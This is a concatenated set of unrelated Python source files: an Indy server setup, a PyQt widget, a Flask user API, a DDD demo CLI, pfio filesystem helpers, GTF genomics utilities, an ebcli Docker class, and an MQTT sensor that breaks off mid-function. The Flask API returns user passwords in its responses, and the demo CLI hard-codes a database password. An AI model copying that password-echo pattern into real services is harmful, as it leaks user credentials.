    from api_indy.tob_anchor.solrqueue import SolrQueue
    from api_indy.tob_anchor.urls import get_routes
    wsgi_handler = WSGIHandler(application)
    app = Application()
    app["manager"] = MANAGER
    app.router.add_routes(get_routes())
    # all other requests forwarded to django
    # (wildcard route, registered after the specific API routes above)
    app.router.add_route("*", "/{path_info:.*}", wsgi_handler)
    processor = CredentialProcessorQueue()
    processor.setup(app)
    solrqueue = SolrQueue()
    solrqueue.setup(app)
    if on_startup:
        app.on_startup.append(on_startup)
    if on_cleanup:
        app.on_cleanup.append(on_cleanup)
    # The X-Served-By response header can be suppressed with DISABLE_SERVER_HEADERS
    # (any value other than empty/"false" disables it).
    no_headers = os.environ.get("DISABLE_SERVER_HEADERS")
    if not no_headers or no_headers == "false":
        app.on_response_prepare.append(add_server_headers)
    return app
def run_django_proc(proc, *args):
    """Call *proc(*args)*, always closing all Django DB connections afterwards."""
    try:
        return proc(*args)
    finally:
        django.db.connections.close_all()
def run_django(proc, *args) -> asyncio.Future:
    """Run a Django-touching callable on the event loop's default executor."""
    return asyncio.get_event_loop().run_in_executor(None, run_django_proc, proc, *args)
def run_reindex():
    """Rebuild the search index via Django's ``update_index`` command."""
    from django.core.management import call_command
    # Batch size is configurable through the SOLR_BATCH_SIZE env variable.
    batch_size = os.getenv("SOLR_BATCH_SIZE", 500)
    call_command("update_index", "--max-retries=5", f"--batch-size={batch_size}")
def run_migration():
    """Apply pending Django database migrations."""
    from django.core.management import call_command
    call_command("migrate")
def start_indy_manager(proc: bool = False):
    """Start the Indy manager and mark the service as running.

    :param proc: when True, start the manager in a separate process
    """
    global MANAGER, STARTED
    start = MANAGER.start_process if proc else MANAGER.start
    start()
    STARTED = True
def pre_init():
    """Start the Indy manager and synchronously register its services."""
    start_indy_manager()
    run_coro(perform_register_services())
async def perform_register_services(app=None):
    """Register Indy services, rolling the manager back on any failure.

    When *app* is given, registration is scheduled on the app's event loop
    and the created task is returned; otherwise it runs inline.
    """
    global MANAGER, STARTED
    if app:
        return app.loop.create_task(
            perform_register_services()
        )
    try:
        await register_services()
    # Fix: made the bare `except:` explicit. BaseException keeps the original
    # semantics (cleanup also runs on cancellation/interrupt) before re-raising.
    except BaseException:
        LOGGER.exception("Error during Indy initialization:")
        MANAGER.stop()
        STARTED = False
        raise
async def register_services():
    """Register the wallet and issuer agent with the Indy service, then sync."""
    await asyncio.sleep(2) # temp fix for messages being sent before exchange has started
    client = indy_client()
    wallet_config = indy_general_wallet_config()
    LOGGER.info("Registering indy agent")
    wallet_id = await client.register_wallet(
        indy_wallet_config(wallet_config))
    LOGGER.debug("Indy wallet id: %s", wallet_id)
    # NOTE(review): "<NAME>" looks like a redacted placeholder rather than a
    # real issuer display name — confirm the intended value.
    agent_id = await client.register_issuer(wallet_id, {
        "id": indy_holder_id(),
        "name": "<NAME>",
        "holder_verifier": True,
    })
    LOGGER.debug("Indy agent id: %s", agent_id)
    await client.sync()
    LOGGER.debug("Indy client synced")
    LOGGER.debug(await client.get_status())
def shutdown():
    """Stop the Indy manager's background service."""
    MANAGER.stop()
# Module-level manager singleton, created at import time so services can be
# initialized before the webserver process forks (see the module docstring).
MANAGER = IndyManager(indy_env())
| StarcoderdataPython |
3336185 | # -*- coding: utf-8 -*-
from PyQt5.QtCore import pyqtSignal
from PyQt5.QtWidgets import QLabel
# Module metadata (note: non-standard single-underscore spelling kept as-is).
_author_ = 'luwt'
_date_ = '2021/12/9 12:27'
class LabelButton(QLabel):
    """A QLabel that emits a ``clicked`` signal when pressed."""

    # Click signal, emitted on every mouse press.
    clicked = pyqtSignal()

    def __init__(self, parent):
        super().__init__(parent)

    def mousePressEvent(self, ev):
        """Emit ``clicked`` without swallowing the press event."""
        self.clicked.emit()
        # Fix: forward the event so QLabel's default mouse-press handling
        # (and normal Qt event propagation) still takes place.
        super().mousePressEvent(ev)
152603 | <reponame>lennykioko/Flask-API
import json
from flask import Blueprint, abort, make_response
from flask_restful import (Resource, Api, reqparse, inputs, fields,
marshal, marshal_with, url_for)
import models
# Fields returned when marshalling a user in API responses.
# NOTE(review): this includes 'password' — echoing a password (even a hash)
# back to API clients looks like a data leak; confirm and consider removing.
user_fields = {
    'username': fields.String,
    'email': fields.String,
    'password': fields.String
}
class UserList(Resource):
    """REST resource handling user creation."""

    # (field name, missing-field help message) for every required argument.
    _ARG_SPECS = (
        ('username', 'No Username Provided'),
        ('email', 'No email Provided'),
        ('password', 'No Password Provided'),
        ('verify_password', 'No Password Verification Provided'),
    )

    def __init__(self):
        self.reqparse = reqparse.RequestParser()
        for arg_name, help_text in self._ARG_SPECS:
            self.reqparse.add_argument(
                arg_name,
                required=True,
                help=help_text,
                location=['form', 'json'])
        super().__init__()

    def post(self):
        """Create a user when password and verification match."""
        args = self.reqparse.parse_args()
        if args.get('password') != args.get('verify_password'):
            return make_response(
                json.dumps({'error': 'Password and verify_password do not match'}),
                400)
        user = models.User.create_user(**args)
        return marshal(user, user_fields), 201
# Blueprint wiring: expose the UserList resource at /users.
users_api = Blueprint('resources.users', __name__)
api = Api(users_api)
api.add_resource(UserList, '/users', endpoint='users')
| StarcoderdataPython |
3325832 | <reponame>Ermlab/python-ddd<gh_stars>100-1000
from seedwork.infrastructure.request_context import request_context
from seedwork.infrastructure.logging import logger, LoggerFactory
from config.container import Container
from modules.catalog.domain.repositories import SellerRepository
from modules.catalog.application.query.get_all_listings import GetAllListings
from modules.catalog.application.query.get_listings_of_seller import GetListingsOfSeller
from modules.catalog.application.command.create_listing_draft import (
CreateListingDraftCommand,
)
# a sample command line script to print all listings
# run with "cd src && python -m cli"
# configure logger prior to first usage
LoggerFactory.configure(logger_name="cli")
# configure catalog module
# NOTE(review): hard-coded local DB credentials — fine for a demo script,
# but confirm they never point at a real environment.
container = Container()
container.config.from_dict(
    dict(
        DATABASE_URL="postgresql://postgres:password@localhost/postgres",
        DEBUG=True,
    )
)
# instantiate catalog module
catalog_module = container.catalog_module()
logger.info("Application configured")
# let's generate a fake seller id for now
seller_id = SellerRepository.next_id()
# interact with a catalog module by issuing queries and commands
# use request context if you want to logically separate queries/commands
# from each other in the logs
with request_context:
    command = CreateListingDraftCommand(
        title="Foo", description="Bar", price=1, seller_id=seller_id
    )
    result = catalog_module.execute_command(command)
    print(result)
    if result.is_ok():
        logger.info("Draft added")
    else:
        logger.error(result.get_errors())
with request_context:
    query_result = catalog_module.execute_query(GetAllListings())
    logger.info(f"All listings: {query_result.result}")
with request_context:
    query_result = catalog_module.execute_query(
        GetListingsOfSeller(seller_id=seller_id)
    )
    logger.info(f"Listings of seller {seller_id}: {query_result.result}")
8884 | import os
import re
from typing import Tuple
from pfio._typing import Union
from pfio.container import Container
from pfio.io import IO, create_fs_handler
class FileSystemDriverList(object):
    """Registry of filesystem handlers, dispatching on URI scheme patterns."""

    def __init__(self):
        # TODO(tianqi): dynamically create this list
        # as well as the patterns upon loading the pfio module.
        self.scheme_list = ["hdfs", "posix"]
        self.posix_pattern = re.compile(r"file:\/\/(?P<path>.+)")
        self.hdfs_pattern = re.compile(r"(?P<path>hdfs:\/\/.+)")
        self.pattern_list = {"hdfs": self.hdfs_pattern,
                             "posix": self.posix_pattern, }

    def _determine_fs_type(self, path: str) -> Tuple[str, str, bool]:
        """Return (fs_type, actual_path, is_URI) for *path*; posix is the fallback."""
        if path is not None:
            for fs_type, pattern in self.pattern_list.items():
                match = pattern.match(path)
                if match:
                    return (fs_type, match.groupdict()["path"], True)
        return ("posix", path, False)

    def format_path(self, fs: IO, path: str) -> Tuple[str, bool]:
        """Strip the scheme prefix from *path* when it matches *fs*'s type."""
        pattern = self.pattern_list.get(fs.type)
        if pattern is not None:
            match = pattern.match(path)
            if match:
                return (match.groupdict()["path"], True)
        return (path, False)

    def get_handler_from_path(self, path: str) -> Tuple[IO, str, bool]:
        """Create a handler for *path* and return it with the parsed path."""
        fs_type, actual_path, is_URI = self._determine_fs_type(path)
        return (create_fs_handler(fs_type), actual_path, is_URI)

    def get_handler_for_root(self,
                             uri_or_handler_name: str) -> Tuple[IO, str, bool]:
        """Resolve a bare scheme name or a URI into a rooted handler."""
        if uri_or_handler_name in self.pattern_list.keys():
            return (create_fs_handler(uri_or_handler_name), "", False)
        new_handler, actual_path, is_URI = self.get_handler_from_path(
            uri_or_handler_name)
        new_handler.root = actual_path
        return (new_handler, actual_path, is_URI)

    def is_supported_scheme(self, scheme: str) -> bool:
        """Whether *scheme* names one of the supported filesystem types."""
        return scheme in self.scheme_list
class DefaultContext(object):
    """Process-wide default filesystem context (handler plus root directory)."""

    def __init__(self):
        self._fs_handler_list = FileSystemDriverList()
        self._root = ""
        # Posix handler is the fallback until set_root() overrides it.
        self._default_context = \
            self._fs_handler_list.get_handler_for_root("posix")[0]

    def set_root(self, uri_or_handler: Union[str, IO]) -> None:
        """Set the default handler (and root dir) from a URI or an IO handler."""
        # TODO(check) if root is directory
        if isinstance(uri_or_handler, IO):
            handler = uri_or_handler
            self._root = ""
        else:
            (handler, self._root, is_URI) = \
                self.get_handler_by_name(uri_or_handler)
        assert handler is not None
        if self._root:
            if not handler.isdir(self._root):
                raise RuntimeError("the URI does not point to a directory")
        self._default_context = handler

    def get_handler(self, path: str = "") -> Tuple[IO, str]:
        """Return (handler, resolved path): non-URI paths are joined onto the
        current root and served by the default handler; URIs get their own."""
        (handler, formatted_path,
         is_URI) = self._fs_handler_list.get_handler_from_path(path)
        if not is_URI:
            actual_path = os.path.join(self._root, formatted_path)
            return (self._default_context, actual_path)
        else:
            return (handler, formatted_path)

    def open_as_container(self, path: str) -> Container:
        """Open *path* as a container via the appropriate handler.

        NOTE(review): the URI branch resets self._root to "" as a side
        effect — confirm this mutation is intended.
        """
        (handler, formatted_path,
         is_URI) = self._fs_handler_list.get_handler_from_path(path)
        if not is_URI:
            actual_path = os.path.join(self._root, formatted_path)
            handler = self._default_context
        else:
            actual_path = formatted_path
            self._root = ""
        return handler.open_as_container(actual_path)

    def get_handler_by_name(self, path: str) -> Tuple[IO, str, bool]:
        """Resolve a scheme name or URI to (handler, root path, is_URI)."""
        return self._fs_handler_list.get_handler_for_root(path)

    def get_root_dir(self) -> str:
        """Return the current root directory (may be empty)."""
        return self._root

    def is_supported_scheme(self, scheme: str) -> bool:
        """Whether *scheme* names a supported filesystem type."""
        return self._fs_handler_list.is_supported_scheme(scheme)
| StarcoderdataPython |
92378 | from Bio import SeqIO
import gzip
import os
import sys
from seqtools.general import rc, translate
def parse_gtf_dict(gtf_str):
    """Parse a GTF attribute column (``key "value"; ...``) into a dict.

    Fix: the previous one-liner left a trailing ``";`` attached to the value
    of the final attribute; values are now stripped clean. Fragments without
    a ``key "value`` separator are skipped instead of raising IndexError.
    """
    attrs = {}
    for item in gtf_str.split('"; '):
        key, sep, value = item.partition(' "')
        if sep:
            attrs[key] = value.rstrip('";')
    return attrs
def gtf_to_gene_length(gtf_file, outfile, sum_type='transcript_longest'):
    """
    Get Gene length, 3 options:
    1. transcript_longest: Length of longest transcript (default)
    2. gene_unique: Length of all unique 'expressed DNA' i.e. count every base that is expressed once
    3. gene_all: Total length of all 'expressed DNA' i.e. if transcripts contain overlapping exons then count exon length multiple times

    Writes one "gene_name,length" line per gene to *outfile*.
    NOTE(review): an invalid sum_type is only rejected (as IOError) after the
    whole GTF has been parsed — consider validating the argument up front.
    """
    if not sum_type == 'transcript_longest':
        # gene_name -> list of every exonic base position; positions repeat
        # when exons overlap across transcripts.
        gene_dict = {}
        gene_count = 0
        with open(gtf_file) as input_fh:
            for line in input_fh:
                if not line.startswith('#'):
                    fields = line.strip().split('\t')
                    if fields[2] == 'exon':
                        gtf_dict = parse_gtf_dict(fields[8])
                        if not gtf_dict['gene_name'] in gene_dict:
                            gene_count += 1
                            if gene_count % 1000 == 0:
                                print(' - {0} genes processed'.format(gene_count))
                            gene_dict[gtf_dict['gene_name']] = []
                        # start has -1 applied, converting to 0-based positions.
                        gene_dict[gtf_dict['gene_name']] += [i for i in range(int(fields[3])-1, int(fields[4]))]
        gene_lengths = []
        for gene in gene_dict:
            if sum_type == 'gene_all':
                gene_lengths.append('{0},{1}\n'.format(gene, len(gene_dict[gene])))
            elif sum_type == 'gene_unique':
                # set() collapses bases shared by overlapping exons.
                gene_lengths.append('{0},{1}\n'.format(gene, len(set(gene_dict[gene]))))
            else:
                raise IOError('sum_type must be gene_all, gene_unique or transcript_longest')
    else:
        # gene_name -> {transcript_id -> summed exon length}.
        gene_dict = {}
        gene_count = 0
        with open(gtf_file) as input_fh:
            for line in input_fh:
                if not line.startswith('#'):
                    fields = line.strip().split('\t')
                    if fields[2] == 'exon':
                        gtf_dict = parse_gtf_dict(fields[8])
                        if not gtf_dict['gene_name'] in gene_dict:
                            gene_count += 1
                            if gene_count % 1000 == 0:
                                print(' - {0} genes processed'.format(gene_count))
                            gene_dict[gtf_dict['gene_name']] = {}
                        if not gtf_dict['transcript_id'] in gene_dict[gtf_dict['gene_name']]:
                            gene_dict[gtf_dict['gene_name']][gtf_dict['transcript_id']] = 0
                        # Inclusive coordinates, hence the +1.
                        gene_dict[gtf_dict['gene_name']][gtf_dict['transcript_id']] += int(fields[4]) - int(fields[3]) + 1
        gene_lengths = []
        for gene in gene_dict:
            transcript_lengths = gene_dict[gene].values()
            gene_lengths.append('{0},{1}\n'.format(gene, max(transcript_lengths)))
    with open(outfile, 'w') as output_fh:
        for gene in gene_lengths:
            output_fh.write(gene)
def get_transcripts(ens_gene_id, output_dir, gtf_file, fasta_str,
                    protein=False):
    """Write one FASTA file per transcript of *ens_gene_id*.

    :param ens_gene_id: Ensembl gene id whose transcripts to extract
    :param output_dir: directory that receives the per-transcript .fa files
    :param gtf_file: GTF annotation file path
    :param fasta_str: gzipped per-chromosome FASTA path template containing a
        '{}' placeholder for the chromosome name (assumes one sequence record
        per file — TODO confirm)
    :param protein: if True, use CDS features and translate the sequence
    """
    exons = {}
    if protein == True:
        feature_type = 'CDS'
    else:
        feature_type = 'exon'
    with open(gtf_file) as input_fh:
        for line in input_fh:
            if not line.startswith('#'):
                fields = line.strip().split('\t')
                if fields[2] == feature_type:
                    gtf_dict = parse_gtf_dict(fields[8])
                    if gtf_dict['gene_id'] == ens_gene_id:
                        if not gtf_dict['transcript_id'] in exons:
                            exons[gtf_dict['transcript_id']] = []
                        exons[gtf_dict['transcript_id']].append({
                            'chrom': fields[0],
                            'start': int(fields[3]),
                            'end': int(fields[4]),
                            'strand': fields[6],
                        })
    for transcript in exons:
        # NOTE(review): if a transcript's exons report mixed strands, neither
        # branch runs and 'strand'/'sorted_exons' stay unbound (NameError
        # below) — confirm whether such input is possible.
        if set([i['strand'] for i in exons[transcript]]) == set('+'):
            strand = '+'
            sorted_exons = sorted(exons[transcript], key=lambda i:i['start'])
        elif set([i['strand'] for i in exons[transcript]]) == set('-'):
            strand = '-'
            sorted_exons = sorted(exons[transcript], key=lambda i:i['start'], reverse=True)
        sequence = ''
        with gzip.open(fasta_str.format(exons[transcript][0]['chrom']), 'rt') as input_fh:
            for record in SeqIO.parse(input_fh, 'fasta'):
                chrom_seq = str(record.seq)
        for exon in sorted_exons:
            if strand == '+':
                sequence += chrom_seq[exon['start']-1:exon['end']]
            elif strand == '-':
                # Minus-strand exons are reverse-complemented before joining.
                sequence += rc(chrom_seq[exon['start']-1:exon['end']])
        if protein == True:
            sequence = translate(sequence)
        with open(os.path.join(output_dir, transcript + '.fa'), 'w') as output_fh:
            output_fh.write('>{0}\n{1}\n'.format(transcript, sequence))
        print('fasta file written: {0}/{1}.fa'.format(output_dir, transcript))
if __name__ == '__main__':
    # CLI: gtf_to_gene_length GTF_FILE OUTFILE [SUM_TYPE]
    if len(sys.argv) == 3:
        # gtf wget from ensembl (wget ftp://ftp.ensembl.org/pub/release-95/gtf/mus_musculus/Mus_musculus.GRCm38.95.gtf.gz)
        #gtf_to_gene_length(gtf_file='Mus_musculus.GRCm38.95.gtf',
        #                   outfile='mm10_gene_lengths.txt')
        gtf_to_gene_length(gtf_file=sys.argv[1],
                           outfile=sys.argv[2])
    elif len(sys.argv) == 4:
        # Fix: gtf_to_gene_length has no 'include_all' parameter — passing it
        # raised TypeError. The third CLI argument selects the sum_type.
        gtf_to_gene_length(gtf_file=sys.argv[1],
                           outfile=sys.argv[2],
                           sum_type=sys.argv[3])
    else:
        pass
| StarcoderdataPython |
1724328 | <filename>amr_verbnet_semantics/test/test_verbnet.py
from nltk.corpus.reader import VerbnetCorpusReader
from nltk.corpus.util import LazyCorpusLoader
# Lazily load the local VerbNet 3.4 corpus (all non-hidden XML class files).
verbnet = LazyCorpusLoader("verbnet3.4", VerbnetCorpusReader, r"(?!\.).*\.xml")
print(verbnet.frames("escape-51.1-1"))
# This id may be absent from the corpus; the exception is printed rather
# than raised so the demo script continues.
try:
    print(verbnet.frames("escape-51.1-2"))
except Exception as e:
    print(e)
print(verbnet.frames("leave-51.2"))
print(verbnet.subclasses("escape-51.1-1"))
| StarcoderdataPython |
3328938 | <filename>ebcli/docker/container.py
# Copyright 2015 Amazon.com, Inc. or its affiliates. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"). You
# may not use this file except in compliance with the License. A copy of
# the License is located at
#
# http://aws.amazon.com/apache2.0/
#
# or in the "license" file accompanying this file. This file is
# distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF
# ANY KIND, either express or implied. See the License for the specific
# language governing permissions and limitations under the License.
import abc
import hashlib
from . import commands
from . import dockerrun
from . import log
from ..objects.exceptions import CommandError
class Container(object):
    """
    Abstract class subclassed by PreconfiguredContainer and GenericContainer.
    Container holds all of the data and most of the functionality needed to
    run a Docker container locally.
    """
    # NOTE(review): `__metaclass__` only takes effect on Python 2; on
    # Python 3 this attribute is inert and the class is not actually
    # enforced as abstract — confirm which interpreters this must support.
    __metaclass__ = abc.ABCMeta

    def __init__(self, fs_handler, soln_stk, container_cfg,
                 envvars_map=None, host_port=None):
        """
        Constructor for Container.
        :param fs_handler: ContainerFSHandler: manages container related files
        :param soln_stk: SolutionStack: environment's solution stack
        :param container_cfg: dict: container_config.json as dict
        :param envvars_map: dict: optional key-val map of environment variables
        :param host_port: str: optional host port. Same as container port by default
        """
        self.fs_handler = fs_handler
        self.soln_stk = soln_stk
        self.container_cfg = container_cfg
        self.envvars_map = envvars_map
        self.host_port = host_port

    def start(self):
        """
        Download S3 object storing .dockercfg if Authentication provided
        in Dockerrun.aws.json, containerize app by adding Dockerfile if user
        doesn't provide one, then pull, build, and run the container.
        :return None
        """
        # Make sure build-context exclusions are in place before building.
        if self.fs_handler.require_append_dockerignore():
            self.fs_handler.append_dockerignore()
        # Synthesize a Dockerfile only when the user didn't provide one.
        if self.fs_handler.require_new_dockerfile():
            self._containerize()
        if self._require_pull():
            self._pull()
        # Remove any stale container with our deterministic name so the
        # subsequent run under the same name cannot collide.
        self._remove()
        img_id = self._build()
        self._run(img_id)

    def validate(self):
        """
        Validates the container is configured properly.
        :return None
        """
        # Base implementation is a no-op; subclasses may override.
        pass

    def get_name(self, hash_obj=hashlib.sha1):
        """
        Return the name that is or will be assigned to this container.

        The name is the hex digest of the project path, so it is stable
        across invocations for the same project directory.
        :return str
        """
        hash_key = self.fs_handler.docker_proj_path.encode('utf-8')
        return hash_obj(hash_key).hexdigest()

    def is_running(self):
        # True when a container with this project's name is currently running.
        return commands.is_running(self.get_name())

    @abc.abstractmethod
    def _containerize(self, destination_dockerfile=None):
        """
        Make a Dockerfile at the destination path; used when the user doesn't
        provide a Dockerfile.
        :param destination_dockerfile: str: full path to destination Dockerfile
        :return None
        """
        pass

    def _get_full_docker_path(self):
        """
        Return the full path to the Dockerfile we will be using for pulling
        and building Docker images.
        :return str
        """
        if self.fs_handler.dockerfile_exists:
            return self.fs_handler.dockerfile_path
        else:  # Then we create one at .elasticbeanstalk/Dockerfile.local
            return self.fs_handler.new_dockerfile_path

    def _require_pull(self):
        # Dockerrun.aws.json decides whether a pre-built image must be pulled.
        return dockerrun.require_docker_pull(self.fs_handler.dockerrun)

    def _pull(self):
        return commands.pull_img(self._get_full_docker_path())

    def _build(self):
        # Build from the project directory as build context; returns image id.
        return commands.build_img(self.fs_handler.docker_proj_path,
                                  self._get_full_docker_path())

    def _run(self, img_id):
        # Mount host log directories into the container when the Dockerrun
        # declares log locations, creating the host dirs first.
        log_volume_map = self._get_log_volume_map()
        if log_volume_map:
            log.make_logdirs(self.fs_handler.logdir_path, log_volume_map)
        return commands.run_container(self._get_full_docker_path(),
                                      img_id,
                                      envvars_map=self.envvars_map,
                                      host_port=self.host_port,
                                      volume_map=log_volume_map,
                                      name=self.get_name())

    def _get_log_volume_map(self):
        return log.get_log_volume_map(self.fs_handler.logdir_path,
                                      self.fs_handler.dockerrun)

    def _remove(self):
        # Best-effort cleanup: a CommandError (e.g. no such container) is
        # deliberately swallowed so start() can proceed.
        try:
            commands.rm_container(self.get_name(), force=True)
        except CommandError:
            pass
| StarcoderdataPython |
1764868 | <reponame>DRubioBizcaino/AIS-home-assistant
"""
Support for MQTT sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.mqtt/
"""
import logging
import json
from typing import Optional
from datetime import timedelta
import voluptuous as vol
from homeassistant.core import callback
from homeassistant.components import sensor
from homeassistant.components.mqtt import (
ATTR_DISCOVERY_HASH,
CONF_QOS,
CONF_STATE_TOPIC,
MqttAttributes,
MqttAvailability,
MqttDiscoveryUpdate,
MqttEntityDeviceInfo,
subscription,
)
from homeassistant.components.mqtt.discovery import (
MQTT_DISCOVERY_NEW,
clear_discovery_hash,
)
from homeassistant.components.sensor import DEVICE_CLASSES_SCHEMA
from homeassistant.const import (
CONF_FORCE_UPDATE,
CONF_NAME,
CONF_VALUE_TEMPLATE,
STATE_UNKNOWN,
CONF_UNIT_OF_MEASUREMENT,
CONF_ICON,
CONF_DEVICE_CLASS,
CONF_DEVICE,
)
from homeassistant.helpers.entity import Entity
from homeassistant.components import mqtt
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.typing import HomeAssistantType, ConfigType
from homeassistant.helpers.dispatcher import async_dispatcher_connect
_LOGGER = logging.getLogger(__name__)

# Platform-specific configuration keys.
CONF_EXPIRE_AFTER = "expire_after"
CONF_JSON_ATTRS = "json_attributes"  # deprecated; superseded by json_attributes_topic
CONF_UNIQUE_ID = "unique_id"

DEFAULT_NAME = "MQTT Sensor"
DEFAULT_FORCE_UPDATE = False
DEPENDENCIES = ["mqtt"]

# Effectively disables polling (~19 years between scans); state updates are
# expected to arrive via MQTT callbacks instead.
SCAN_INTERVAL = timedelta(seconds=600000000)

# Module-level registries of discovered devices, shared across sensor
# instances and read by get_text()/get_text_to_say().
MQTT_DEVICES = []  # controllable devices seen on the MQTT broker (Status* messages)
NET_DEVICES = []   # controllable devices discovered on the local network
DOM_DEVICES = []   # AIS "dom" gateways

# Base read-only MQTT schema extended with sensor options plus the shared
# availability and JSON-attributes schemas.
PLATFORM_SCHEMA = (
    mqtt.MQTT_RO_PLATFORM_SCHEMA.extend(
        {
            vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
            vol.Optional(CONF_UNIT_OF_MEASUREMENT): cv.string,
            vol.Optional(CONF_ICON): cv.icon,
            vol.Optional(CONF_DEVICE_CLASS): DEVICE_CLASSES_SCHEMA,
            vol.Optional(CONF_JSON_ATTRS, default=[]): cv.ensure_list_csv,
            vol.Optional(CONF_EXPIRE_AFTER): cv.positive_int,
            vol.Optional(CONF_FORCE_UPDATE, default=DEFAULT_FORCE_UPDATE): cv.boolean,
            vol.Optional(CONF_UNIQUE_ID): cv.string,
            vol.Optional(CONF_DEVICE): mqtt.MQTT_ENTITY_DEVICE_INFO_SCHEMA,
        }
    )
    .extend(mqtt.MQTT_AVAILABILITY_SCHEMA.schema)
    .extend(mqtt.MQTT_JSON_ATTRS_SCHEMA.schema)
)
def get_text():
    """Return a Markdown summary (in Polish) of all discovered devices.

    Reads the module-level registries ``MQTT_DEVICES``, ``NET_DEVICES`` and
    ``DOM_DEVICES``; the section for any empty registry is omitted.
    """
    # The original placed a stray "Return the state of the entity" string
    # after ``global`` statements — it was neither a docstring nor accurate.
    # ``global`` declarations are unnecessary here: the lists are only read.
    info = ""
    if len(MQTT_DEVICES) > 0:
        info = (
            "\n### Sterowalne urządzenia w brokerze mqtt ("
            + str(len(MQTT_DEVICES))
            + "):\n"
        )
        for d in MQTT_DEVICES:
            info += "- " + d["FriendlyName"] + ", http://" + d["IPAddress"] + "\n"
    if len(NET_DEVICES) > 0:
        info += "\n### Sterowalne urządzenia w sieci (" + str(len(NET_DEVICES)) + "):\n"
        for d in NET_DEVICES:
            info += str(d) + "\n"
    if len(DOM_DEVICES) > 0:
        info += "\n### Bramki AIS dom (" + str(len(DOM_DEVICES)) + "):\n"
        for d in DOM_DEVICES:
            info += str(d) + "\n"
    return info
def get_text_to_say():
    """Return a short spoken summary (in Polish) of discovered device counts.

    Reads the module-level ``MQTT_DEVICES`` and ``NET_DEVICES`` registries.
    """
    import time
    # Give device discovery time to populate the registries first.
    # NOTE(review): this sleeps 10 seconds (an older comment claimed 5) and
    # blocks the calling thread — must not be invoked on the event loop.
    time.sleep(10)
    if len(MQTT_DEVICES) > 0 or len(NET_DEVICES) > 0:
        info = ""
    else:
        info = "Nie wykryto sterowanych urządzeń."
    if len(MQTT_DEVICES) > 0:
        info += "Liczba wykrytych sterowalnych urządzeń podłączonych do bramki: " + str(
            len(MQTT_DEVICES)
        )
    if len(NET_DEVICES) > 0:
        # Separate the two sentences when both counts are reported.
        if len(MQTT_DEVICES) > 0:
            info += ". "
        info += "Liczba wykrytych sterowalnych urządzeń w sieci: " + str(
            len(NET_DEVICES)
        )
    return info
async def async_setup_platform(
    hass: HomeAssistantType, config: ConfigType, async_add_entities, discovery_info=None
):
    """Set up MQTT sensors defined in configuration.yaml."""
    # YAML-configured sensors carry no discovery hash.
    await _async_setup_entity(config, async_add_entities)
async def async_setup_entry(hass, config_entry, async_add_entities):
    """Set up MQTT sensors dynamically through MQTT discovery."""

    async def async_discover_sensor(discovery_payload):
        """Discover and add a discovered MQTT sensor."""
        # Initialise before the try block: if the payload lookup or schema
        # validation raises, the except handler can still safely test it.
        # (Previously an UnboundLocalError was raised when the payload
        # lacked ATTR_DISCOVERY_HASH.)
        discovery_hash = None
        try:
            discovery_hash = discovery_payload[ATTR_DISCOVERY_HASH]
            config = PLATFORM_SCHEMA(discovery_payload)
            await _async_setup_entity(config, async_add_entities, discovery_hash)
        except Exception:
            # Forget the half-registered discovery entry so the device can be
            # re-discovered, then propagate the original error.
            if discovery_hash:
                clear_discovery_hash(hass, discovery_hash)
            raise

    async_dispatcher_connect(
        hass, MQTT_DISCOVERY_NEW.format(sensor.DOMAIN, "mqtt"), async_discover_sensor
    )
async def _async_setup_entity(
    config: ConfigType, async_add_entities, discovery_hash=None
):
    """Create one MqttSensor entity and register it with Home Assistant."""
    entity = MqttSensor(config, discovery_hash)
    async_add_entities([entity])
class MqttSensor(
    MqttAttributes, MqttAvailability, MqttDiscoveryUpdate, MqttEntityDeviceInfo, Entity
):
    """Representation of a sensor that can be updated using MQTT.

    AIS variant: rather than exposing a payload value as its state (state()
    always returns a single space), this sensor's message handler parses
    STATUS/STATUSNET/STATUSSNS JSON responses and records discovered devices
    in the module-level ``MQTT_DEVICES`` registry.
    """

    def __init__(self, config, discovery_hash):
        """Initialize the sensor."""
        self._config = config
        self._unique_id = config.get(CONF_UNIQUE_ID)
        self._state = STATE_UNKNOWN
        # Subscription bookkeeping handle for (re)subscribe/unsubscribe.
        self._sub_state = None
        # Cancel handle for a pending expire_after timer, if any.
        self._expiration_trigger = None
        self._attributes = None
        device_config = config.get(CONF_DEVICE)
        if config.get(CONF_JSON_ATTRS):
            _LOGGER.warning(
                'configuration variable "json_attributes" is '
                'deprecated, replace with "json_attributes_topic"'
            )
        # Initialise each mixin explicitly (cooperative multiple inheritance).
        MqttAttributes.__init__(self, config)
        MqttAvailability.__init__(self, config)
        MqttDiscoveryUpdate.__init__(self, discovery_hash, self.discovery_update)
        MqttEntityDeviceInfo.__init__(self, device_config)

    async def async_added_to_hass(self):
        """Subscribe to MQTT events."""
        await super().async_added_to_hass()
        await self._subscribe_topics()

    async def discovery_update(self, discovery_payload):
        """Handle updated discovery message."""
        # Re-validate the payload and refresh every mixin's configuration.
        config = PLATFORM_SCHEMA(discovery_payload)
        self._config = config
        await self.attributes_discovery_update(config)
        await self.availability_discovery_update(config)
        await self._subscribe_topics()
        self.async_schedule_update_ha_state()

    async def _subscribe_topics(self):
        """(Re)Subscribe to topics.

        NOTE(review): the actual subscription call at the bottom is commented
        out, so ``message_received`` is currently never invoked — confirm
        whether this is intentional in the AIS fork.
        """
        template = self._config.get(CONF_VALUE_TEMPLATE)
        if template is not None:
            template.hass = self.hass

        @callback
        def message_received(topic, payload, qos):
            """Handle new MQTT messages."""
            global MQTT_DEVICES
            """Handle new MQTT messages."""
            try:
                message = json.loads(payload)
                ip_address = ""
                friendly_name = ""
                sensors = ""
                # Normalise "stat/<device>/STATUS..." down to the device topic.
                topic = topic.replace("stat/", "").replace("/STATUS", "")
                if "Status" in message:
                    friendly_name = message.get("Status")["FriendlyName"][0]
                elif "StatusNET" in message:
                    ip_address = message.get("StatusNET")["IPAddress"]
                    # Drop the trailing "5" left over from ".../STATUS5".
                    topic = topic[0:-1]
                elif "StatusSNS" in message:
                    sensors = message.get("StatusSNS")
                    # Drop the trailing "10" left over from ".../STATUS10".
                    topic = topic[0:-2]
                else:
                    return
                # check if device exists in collection
                device_not_exist = True
                for d in MQTT_DEVICES:
                    if d["topic"] == topic:
                        device_not_exist = False
                        # Merge the newly learned fields into the record.
                        if ip_address != "":
